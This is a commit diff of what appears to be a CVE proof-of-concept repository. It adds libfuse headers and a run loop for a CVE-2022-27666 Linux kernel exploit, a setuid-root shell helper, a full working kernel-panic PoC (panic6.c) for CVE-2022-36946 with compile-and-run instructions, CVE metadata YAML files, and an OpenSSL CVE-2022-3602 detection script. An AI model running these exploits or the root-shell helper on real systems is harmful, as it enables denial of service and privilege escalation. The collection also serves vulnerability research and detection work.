uint32_t padding;
};
struct fuse_lk_out {
struct fuse_file_lock lk;
};
struct fuse_access_in {
uint32_t mask;
uint32_t padding;
};
struct fuse_init_in {
uint32_t major;
uint32_t minor;
uint32_t max_readahead;
uint32_t flags;
};
#define FUSE_COMPAT_INIT_OUT_SIZE 8
#define FUSE_COMPAT_22_INIT_OUT_SIZE 24
struct fuse_init_out {
uint32_t major;
uint32_t minor;
uint32_t max_readahead;
uint32_t flags;
uint16_t max_background;
uint16_t congestion_threshold;
uint32_t max_write;
uint32_t time_gran;
uint16_t max_pages;
uint16_t padding;
uint32_t unused[8];
};
#define CUSE_INIT_INFO_MAX 4096
struct cuse_init_in {
uint32_t major;
uint32_t minor;
uint32_t unused;
uint32_t flags;
};
struct cuse_init_out {
uint32_t major;
uint32_t minor;
uint32_t unused;
uint32_t flags;
uint32_t max_read;
uint32_t max_write;
uint32_t dev_major; /* chardev major */
uint32_t dev_minor; /* chardev minor */
uint32_t spare[10];
};
struct fuse_interrupt_in {
uint64_t unique;
};
struct fuse_bmap_in {
uint64_t block;
uint32_t blocksize;
uint32_t padding;
};
struct fuse_bmap_out {
uint64_t block;
};
struct fuse_ioctl_in {
uint64_t fh;
uint32_t flags;
uint32_t cmd;
uint64_t arg;
uint32_t in_size;
uint32_t out_size;
};
struct fuse_ioctl_iovec {
uint64_t base;
uint64_t len;
};
struct fuse_ioctl_out {
int32_t result;
uint32_t flags;
uint32_t in_iovs;
uint32_t out_iovs;
};
struct fuse_poll_in {
uint64_t fh;
uint64_t kh;
uint32_t flags;
uint32_t events;
};
struct fuse_poll_out {
uint32_t revents;
uint32_t padding;
};
struct fuse_notify_poll_wakeup_out {
uint64_t kh;
};
struct fuse_fallocate_in {
uint64_t fh;
uint64_t offset;
uint64_t length;
uint32_t mode;
uint32_t padding;
};
struct fuse_in_header {
uint32_t len;
uint32_t opcode;
uint64_t unique;
uint64_t nodeid;
uint32_t uid;
uint32_t gid;
uint32_t pid;
uint32_t padding;
};
struct fuse_out_header {
uint32_t len;
int32_t error;
uint64_t unique;
};
struct fuse_dirent {
uint64_t ino;
uint64_t off;
uint32_t namelen;
uint32_t type;
char name[];
};
#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name)
#define FUSE_DIRENT_ALIGN(x) \
(((x) + sizeof(uint64_t) - 1) & ~(sizeof(uint64_t) - 1))
#define FUSE_DIRENT_SIZE(d) \
FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen)
struct fuse_direntplus {
struct fuse_entry_out entry_out;
struct fuse_dirent dirent;
};
#define FUSE_NAME_OFFSET_DIRENTPLUS \
offsetof(struct fuse_direntplus, dirent.name)
#define FUSE_DIRENTPLUS_SIZE(d) \
FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET_DIRENTPLUS + (d)->dirent.namelen)
struct fuse_notify_inval_inode_out {
uint64_t ino;
int64_t off;
int64_t len;
};
struct fuse_notify_inval_entry_out {
uint64_t parent;
uint32_t namelen;
uint32_t padding;
};
struct fuse_notify_delete_out {
uint64_t parent;
uint64_t child;
uint32_t namelen;
uint32_t padding;
};
struct fuse_notify_store_out {
uint64_t nodeid;
uint64_t offset;
uint32_t size;
uint32_t padding;
};
struct fuse_notify_retrieve_out {
uint64_t notify_unique;
uint64_t nodeid;
uint64_t offset;
uint32_t size;
uint32_t padding;
};
/* Matches the size of fuse_write_in */
struct fuse_notify_retrieve_in {
uint64_t dummy1;
uint64_t offset;
uint32_t size;
uint32_t dummy2;
uint64_t dummy3;
uint64_t dummy4;
};
/* Device ioctls: */
#define FUSE_DEV_IOC_CLONE _IOR(229, 0, uint32_t)
struct fuse_lseek_in {
uint64_t fh;
uint64_t offset;
uint32_t whence;
uint32_t padding;
};
struct fuse_lseek_out {
uint64_t offset;
};
struct fuse_copy_file_range_in {
uint64_t fh_in;
uint64_t off_in;
uint64_t nodeid_out;
uint64_t fh_out;
uint64_t off_out;
uint64_t len;
uint64_t flags;
};
#endif /* _LINUX_FUSE_H */

82
cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h Normal file
View File

@ -0,0 +1,82 @@
/*
FUSE: Filesystem in Userspace
Copyright (C) 2019 Red Hat, Inc.
This program can be distributed under the terms of the GNU LGPLv2.
See the file COPYING.LIB.
*/
#ifndef FUSE_LOG_H_
#define FUSE_LOG_H_
/** @file
*
* This file defines the logging interface of FUSE
*/
#include <stdarg.h>
#ifdef __cplusplus
extern "C" {
#endif
/**
* Log severity level
*
* These levels correspond to syslog(2) log levels since they are widely used.
*/
enum fuse_log_level {
FUSE_LOG_EMERG,
FUSE_LOG_ALERT,
FUSE_LOG_CRIT,
FUSE_LOG_ERR,
FUSE_LOG_WARNING,
FUSE_LOG_NOTICE,
FUSE_LOG_INFO,
FUSE_LOG_DEBUG
};
/**
* Log message handler function.
*
* This function must be thread-safe. It may be called from any libfuse
* function, including fuse_parse_cmdline() and other functions invoked before
* a FUSE filesystem is created.
*
* Install a custom log message handler function using fuse_set_log_func().
*
* @param level log severity level
* @param fmt sprintf-style format string including newline
* @param ap format string arguments
*/
typedef void (*fuse_log_func_t)(enum fuse_log_level level,
const char *fmt, va_list ap);
/**
* Install a custom log handler function.
*
* Log messages are emitted by libfuse functions to report errors and debug
* information. Messages are printed to stderr by default but this can be
* overridden by installing a custom log message handler function.
*
* The log message handler function is global and affects all FUSE filesystems
* created within this process.
*
* @param func a custom log message handler function or NULL to revert to
* the default
*/
void fuse_set_log_func(fuse_log_func_t func);
/**
* Emit a log message
*
* @param level severity level (FUSE_LOG_ERR, FUSE_LOG_DEBUG, etc)
* @param fmt sprintf-style format string including newline
*/
void fuse_log(enum fuse_log_level level, const char *fmt, ...);
#ifdef __cplusplus
}
#endif
#endif /* FUSE_LOG_H_ */

2100
cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h Normal file
View File

File diff suppressed because it is too large Load Diff

271
cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h Normal file
View File

@ -0,0 +1,271 @@
/*
FUSE: Filesystem in Userspace
Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>
This program can be distributed under the terms of the GNU LGPLv2.
See the file COPYING.LIB.
*/
#ifndef FUSE_OPT_H_
#define FUSE_OPT_H_
/** @file
*
* This file defines the option parsing interface of FUSE
*/
#ifdef __cplusplus
extern "C" {
#endif
/**
* Option description
*
* This structure describes a single option, and action associated
* with it, in case it matches.
*
* More than one such match may occur, in which case the action for
* each match is executed.
*
* There are three possible actions in case of a match:
*
* i) An integer (int or unsigned) variable determined by 'offset' is
* set to 'value'
*
* ii) The processing function is called, with 'value' as the key
*
* iii) An integer (any) or string (char *) variable determined by
* 'offset' is set to the value of an option parameter
*
* 'offset' should normally be either set to
*
* - 'offsetof(struct foo, member)' actions i) and iii)
*
* - -1 action ii)
*
* The 'offsetof()' macro is defined in the <stddef.h> header.
*
* The template determines which options match, and also have an
* effect on the action. Normally the action is either i) or ii), but
* if a format is present in the template, then action iii) is
* performed.
*
* The types of templates are:
*
* 1) "-x", "-foo", "--foo", "--foo-bar", etc. These match only
* themselves. Invalid values are "--" and anything beginning
* with "-o"
*
* 2) "foo", "foo-bar", etc. These match "-ofoo", "-ofoo-bar" or
* the relevant option in a comma separated option list
*
* 3) "bar=", "--foo=", etc. These are variations of 1) and 2)
* which have a parameter
*
* 4) "bar=%s", "--foo=%lu", etc. Same matching as above but perform
* action iii).
*
* 5) "-x ", etc. Matches either "-xparam" or "-x param" as
* two separate arguments
*
* 6) "-x %s", etc. Combination of 4) and 5)
*
* If the format is "%s", memory is allocated for the string unlike with
* scanf(). The previous value (if non-NULL) stored at the this location is
* freed.
*/
struct fuse_opt {
/** Matching template and optional parameter formatting */
const char *templ;
/**
* Offset of variable within 'data' parameter of fuse_opt_parse()
* or -1
*/
unsigned long offset;
/**
* Value to set the variable to, or to be passed as 'key' to the
* processing function. Ignored if template has a format
*/
int value;
};
/**
* Key option. In case of a match, the processing function will be
* called with the specified key.
*/
#define FUSE_OPT_KEY(templ, key) { templ, -1U, key }
/**
* Last option. An array of 'struct fuse_opt' must end with a NULL
* template value
*/
#define FUSE_OPT_END { NULL, 0, 0 }
/**
* Argument list
*/
struct fuse_args {
/** Argument count */
int argc;
/** Argument vector. NULL terminated */
char **argv;
/** Is 'argv' allocated? */
int allocated;
};
/**
* Initializer for 'struct fuse_args'
*/
#define FUSE_ARGS_INIT(argc, argv) { argc, argv, 0 }
/**
* Key value passed to the processing function if an option did not
* match any template
*/
#define FUSE_OPT_KEY_OPT -1
/**
* Key value passed to the processing function for all non-options
*
* Non-options are the arguments beginning with a character other than
* '-' or all arguments after the special '--' option
*/
#define FUSE_OPT_KEY_NONOPT -2
/**
* Special key value for options to keep
*
* Argument is not passed to processing function, but behave as if the
* processing function returned 1
*/
#define FUSE_OPT_KEY_KEEP -3
/**
* Special key value for options to discard
*
* Argument is not passed to processing function, but behave as if the
* processing function returned zero
*/
#define FUSE_OPT_KEY_DISCARD -4
/**
* Processing function
*
* This function is called if
* - option did not match any 'struct fuse_opt'
* - argument is a non-option
* - option did match and offset was set to -1
*
* The 'arg' parameter will always contain the whole argument or
* option including the parameter if exists. A two-argument option
* ("-x foo") is always converted to single argument option of the
* form "-xfoo" before this function is called.
*
* Options of the form '-ofoo' are passed to this function without the
* '-o' prefix.
*
* The return value of this function determines whether this argument
* is to be inserted into the output argument vector, or discarded.
*
* @param data is the user data passed to the fuse_opt_parse() function
* @param arg is the whole argument or option
* @param key determines why the processing function was called
* @param outargs the current output argument list
* @return -1 on error, 0 if arg is to be discarded, 1 if arg should be kept
*/
typedef int (*fuse_opt_proc_t)(void *data, const char *arg, int key,
struct fuse_args *outargs);
/**
* Option parsing function
*
* If 'args' was returned from a previous call to fuse_opt_parse() or
* it was constructed from
*
* A NULL 'args' is equivalent to an empty argument vector
*
* A NULL 'opts' is equivalent to an 'opts' array containing a single
* end marker
*
* A NULL 'proc' is equivalent to a processing function always
* returning '1'
*
* @param args is the input and output argument list
* @param data is the user data
* @param opts is the option description array
* @param proc is the processing function
* @return -1 on error, 0 on success
*/
int fuse_opt_parse(struct fuse_args *args, void *data,
const struct fuse_opt opts[], fuse_opt_proc_t proc);
/**
* Add an option to a comma separated option list
*
* @param opts is a pointer to an option list, may point to a NULL value
* @param opt is the option to add
* @return -1 on allocation error, 0 on success
*/
int fuse_opt_add_opt(char **opts, const char *opt);
/**
* Add an option, escaping commas, to a comma separated option list
*
* @param opts is a pointer to an option list, may point to a NULL value
* @param opt is the option to add
* @return -1 on allocation error, 0 on success
*/
int fuse_opt_add_opt_escaped(char **opts, const char *opt);
/**
* Add an argument to a NULL terminated argument vector
*
* @param args is the structure containing the current argument list
* @param arg is the new argument to add
* @return -1 on allocation error, 0 on success
*/
int fuse_opt_add_arg(struct fuse_args *args, const char *arg);
/**
* Add an argument at the specified position in a NULL terminated
* argument vector
*
* Adds the argument to the N-th position. This is useful for adding
* options at the beginning of the array which must not come after the
* special '--' option.
*
* @param args is the structure containing the current argument list
* @param pos is the position at which to add the argument
* @param arg is the new argument to add
* @return -1 on allocation error, 0 on success
*/
int fuse_opt_insert_arg(struct fuse_args *args, int pos, const char *arg);
/**
* Free the contents of argument list
*
* The structure itself is not freed
*
* @param args is the structure containing the argument list
*/
void fuse_opt_free_args(struct fuse_args *args);
/**
* Check if an option matches
*
* @param opts is the option description array
* @param opt is the option to match
* @return 1 if a match is found, 0 if not
*/
int fuse_opt_match(const struct fuse_opt opts[], const char *opt);
#ifdef __cplusplus
}
#endif
#endif /* FUSE_OPT_H_ */

4
cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build Normal file
View File

@ -0,0 +1,4 @@
libfuse_headers = [ 'fuse.h', 'fuse_common.h', 'fuse_lowlevel.h',
'fuse_opt.h', 'cuse_lowlevel.h', 'fuse_log.h' ]
install_headers(libfuse_headers, subdir: 'fuse3')

BIN
cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a Normal file
View File

Binary file not shown.

6
cve/linux-kernel/2022/CVE-2022-27666/myshell.c Normal file
View File

@ -0,0 +1,6 @@
#include <stdlib.h>
int main() {
setuid(0);
system("/bin/bash");
}

2215
cve/linux-kernel/2022/CVE-2022-27666/poc.c Normal file
View File

File diff suppressed because it is too large Load Diff

9
cve/linux-kernel/2022/CVE-2022-27666/run.sh Executable file
View File

@ -0,0 +1,9 @@
#!/bin/bash
cp get_rooot /tmp/
cp myshell /tmp/
while true
do
./poc
ps aux | grep poc | awk '{ print $2 }' | while read line; do kill -9 $line; done || echo "kill poc, rerun again"
done

39
cve/linux-kernel/2022/CVE-2022-36946/README.md Normal file
View File

@ -0,0 +1,39 @@
# CVE-2022-36946
Reported-by: Domingo Dirutigliano and Nicola Guerrera
While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics.
This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink.
# How does it work?
The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute.
```
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num);
nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0);
nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT );
```
This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook.
So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic.
Try it executing [this](/panic6.c) c source code.
# Fix up
Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18)
Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2)
# Requirements for exploiting this vuln:
- A vulnerable linux kernel
- CAP\_NET\_ADMIN capability
# Why panic6?
It worked at the 6th attempt, so we kept the name.

104
cve/linux-kernel/2022/CVE-2022-36946/panic6.c Normal file
View File

@ -0,0 +1,104 @@
#include <arpa/inet.h>
#include <linux/netfilter/nfnetlink_queue.h>
#include <libnetfilter_queue/libnetfilter_queue.h>
#include <linux/netfilter/nfnetlink_conntrack.h>
#include <libmnl/libmnl.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/types.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <string.h>
//How to compile:
//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic
int socket_conn(uint16_t port)
{
int sockfd, connfd;
struct sockaddr_in servaddr, cli;
// socket create and verification
sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
if (sockfd == -1) {
perror("socket creation failed");
exit(EXIT_FAILURE);
}
bzero(&servaddr, sizeof(servaddr));
// assign IP, PORT
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
servaddr.sin_port = htons(port);
// connect the client socket to server socket
connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
}
int main(int argc, char *argv[])
{
size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2);
char buf[BUF_SIZE];
uint16_t queue_num = 1337;
struct nlmsghdr *nlh;
puts("[*] Creating the socket with the kernel");
struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
if (nl == NULL) {
perror( "mnl_socket_open" );
exit(EXIT_FAILURE);
}
puts("[*] Binding the socket");
if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
perror( "mnl_socket_bind" );
exit(EXIT_FAILURE);
}
printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num);
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num);
nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND);
if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
perror( "mnl_socket_send" );
exit(EXIT_FAILURE);
}
puts("[*] Setting config to COPY_META mode");
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num);
nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff);
mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO));
mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO));
if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
perror( "mnl_socket_send" );
exit(EXIT_FAILURE);
}
printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num);
puts("Press ENTER to contiune (and panic)");
getchar();
puts("[*] Sending a connection packet to nfqueue");
socket_conn(1337);
puts("[*] Waiting for a packet in the nfqueue");
if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) {
perror( "mnl_socket_recvfrom" );
exit(EXIT_FAILURE);
}
puts("[*] Sending the verdict with a NULL pointer and len = 0");
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num);
nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0);
nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT );
puts("[*] Sending the verdict to the kernel, Good panic :D");
sleep(1); //Only to see the print
if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
perror( "mnl_socket_send" );
exit(EXIT_FAILURE);
}
puts("[*] Are you still alive?");
}

18
cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml Normal file
View File

@ -0,0 +1,18 @@
id: CVE-2022-36946
source: https://github.com/Pwnzer0tt1/CVE-2022-36946
info:
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
severity: 高危
description: |
Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 panic因为在具有单字节nfta_payload属性的nf_queue判定的情况下skb_pull可能会遇到负的 skb->len。
scope-of-influence:
5.18.14
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-36946
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2022-36946
tags: 拒绝服务,cve2022

21
cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2022-0847
source: https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
info:
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
severity: high
description: |
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
scope-of-influence:
Linux kernel<5.17-rc6
reference:
- https://dirtypipe.cm4all.com/
- https://bugzilla.redhat.com/show_bug.cgi?id=2060795
- https://security.netapp.com/advisory/ntap-20220325-0005/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2022-0847
cwe-id: CWE-665, CWE-281
cnvd-id: None
kve-id: None
tags: 权限提升

20
cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2022-23222
source: https://github.com/tr3ee/CVE-2022-23222
info:
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
severity: high
description: |
由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限
scope-of-influence:
Linux kernel(>=5.8 && <=5.16)
reference:
- https://www.openwall.com/lists/oss-security/2022/06/04/3
- https://security.netapp.com/advisory/ntap-20220217-0002/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2022-23222
cwe-id: CWE-476
cnvd-id: None
kve-id: None
tags: cve2022,权限提升

21
cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2022-25258
source:
https://github.com/szymonh/d-os-descriptor
info:
name: Linux kernel是Linux操作系统的主要组件也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。
severity: medium
description:
在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现一个问题。USB Gadget子系统缺乏对接口操作系统描述符请求的某些验证具有大数组索引的请求和与NULL函数指针检索有关的请求。可能会发生内存损坏。
scope-of-influence:
Debian 9.0, Debian 10.0, Debian 11.0
references:
- https://nvd.nist.gov/vuln/detail/CVE-2022-25258
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.10
classification:
cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 4.6
cvi-id: CVE-2022-25258
cwe-id: CWE-476
cnvd-id: None
kve-id: None
tags: 内存损坏

18
cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml Normal file
View File

@ -0,0 +1,18 @@
id: CVE-2022-27666
source: https://github.com/plummm/CVE-2022-27666
info:
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
severity: High
description: |
Linux kernel 5.16.15之前版本存在安全漏洞该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
scope-of-influence:
~ linux kernel 5.17-rc5
reference:
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15
- https://www.debian.org/security/2022/dsa-5173
- https://security.netapp.com/advisory/ntap-20220429-0001/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2022-27666
tags: 缓冲区溢出,权限提升,cve2022

39
cve/openssl/2022/CVE-2022-3602/README.md Normal file
View File

@ -0,0 +1,39 @@
# CVE-2022-3602
This is a detection script which will determine whether client authentication is required by the SSL server,
in which case servers based on OpenSSL 3.0.0 to 3.0.6 will be vulnerable to both CVE-2022-3602 and CVE-2022-3786
## Prerequisite's
- python3
- pip install -r requirements.txt
## Usage
```
usage: openssl_cert_detector.py [-h] [-t TARGET] [-T TARGETS]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single IP with port separate by colon. Example: -t 192.168.0.3:3000
-T TARGETS, --targets TARGETS
List of IP and port separate by colon and separated by new line in text file
```
### Example 1:
To check for openssl vulnerability on single ip and port
```
python openssl_cert_detector.py -t 192.168.0.3:3000
```
### Example 2:
To check for openssl vulnerability on list of ip and its port in separated by new line in text file
```
python openssl_cert_detector.py -T check.txt
```
## References
- https://github.com/colmmacc/CVE-2022-3602
- https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/openssl-punycode-vulnerability
- https://github.com/jfrog/jfrog-openssl-tools

105
cve/openssl/2022/CVE-2022-3602/openssl_cert_detector.py Normal file
View File

@ -0,0 +1,105 @@
import socket
import ssl
import sys
import warnings
import enum
import argparse
import ipaddress
warnings.filterwarnings("ignore", category=DeprecationWarning)
TIMEOUT = 0.2
class OpSll(enum.Enum):
Error = -1
Cert_not_required = 0
Cert_required = 1
def fileload(filename):
# This get input from text file and converts to list
f= open(filename, "r")
content=f.read()
f.close()
content=content.split("\n")
while("" in content):
content.remove("")
return content
def Server_Connection_Status(host, port):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
client = ssl.wrap_socket(client)
try:
client.connect((host, port))
except Exception as e:
print(e)
return OpSll.Error
client.settimeout(TIMEOUT)
try:
client.read(1)
except ssl.SSLError as err:
if "CERTIFICATE_REQUIRED" in str(err):
return OpSll.Cert_required
except TimeoutError:
return OpSll.Cert_not_required
except Exception as e:
return OpSll.Error
return OpSll.Cert_not_required
def reporting(host, port, status):
print('[*] Host information: {0}:{1}'.format(host,port))
if OpSll.Cert_not_required == status:
print('[+] Status: {0}'.format('Not Vulnerable'))
print('[+] Reason: {0}'.format('Client certificate not required!'))
if OpSll.Cert_required == status:
print('[+] Status: {0}'.format('Vulnerable'))
print('[+] Reason: {0}'.format('Client certificate is required!'))
if OpSll.Error == status:
print('[-] Status: {0}'.format('Unable to connect'))
print('[-] Reason: {0}'.format('Either Host is down or crashed!'))
# adding argparse modules
parser = argparse.ArgumentParser()
parser.add_argument("-t","--target", help="Single IP with port separate by colon. Example: -t 192.168.0.3:3000",type=str)
parser.add_argument("-T","--targets", help="List of IP and port separate by colon ssin text file",type=str)
args = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
if __name__ == "__main__":
print('[!] CVE: CVE-2022-3602, CVE-2022-3786')
print('[!] This script will detect whether openssl \n[!] server is vulnerable or not based on')
print('[!] whether certificated is required by server or not\n')
info=dict()
if args.target:
ip_list=[args.target]
if args.targets:
ip_list=fileload(args.targets)
if len(ip_list)==0:
print("Required argument:\n-t or -T Single Ip/file with ip list")
sys.exit(1)
for host in ip_list:
host=host.split(":")
res = Server_Connection_Status(host[0],int(host[1]))
reporting(host[0],int(host[1]), res)
print('\n')

2
cve/openssl/2022/CVE-2022-3602/requirements.txt Normal file
View File

@ -0,0 +1,2 @@
argparse
ipaddress

27
cve/openssl/2022/yaml/CVE-2022-3602.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2022-3602
source:
https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786
info:
name: Openssl是一个功能极其强大的命令行工具可以用来完成公钥体系及HTTPS相关的很多任务。
severity: high
description: |
Openssl 3.0.x版本在X.509证书验证过程中存在4个字节的邮箱地址缓存溢出问题可能导致内存损坏攻击者可能能够在执行计算的计算机上触发远程代码执行。
scope-of-influence:
Openssl 3.0.0
Openssl 3.0.1
Openssl 3.0.2
Openssl 3.0.3
Openssl 3.0.4
Openssl 3.0.5
Openssl 3.0.6
reference:
- https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/
- https://nvd.nist.gov/vuln/detail/cve-2022-3602
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2022-3602
cwe-id: CWE-120
cnvd-id: None
kve-id: None
tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行

6
openkylin_list.yaml
View File

@ -6,6 +6,8 @@ cve:
- CVE-2021-42013
apache-APISIX:
- CVE-2022-24112
apache-solr:
- CVE-2021-27905
linux-kernel:
- CVE-2021-4204
- CVE-2021-22555
@ -19,13 +21,16 @@ cve:
- CVE-2022-2588
- CVE-2022-25636
- CVE-2022-1679
- CVE-2022-25258
- CVE-2023-0045
- CVE-2022-32250
- CVE-2022-27666
sudo:
- CVE-2021-3156
- CVE-2023-22809
gitlab:
- CVE-2021-22205
- CVE-2022-1162
confluence:
- CVE-2019-3396
- CVE-2021-26084
@ -50,6 +55,7 @@ cve:
openssl:
- CVE-2022-1292
- CVE-2022-2274
- CVE-2022-3602
- CVE-2023-25136
libxml2:
- CVE-2020-24977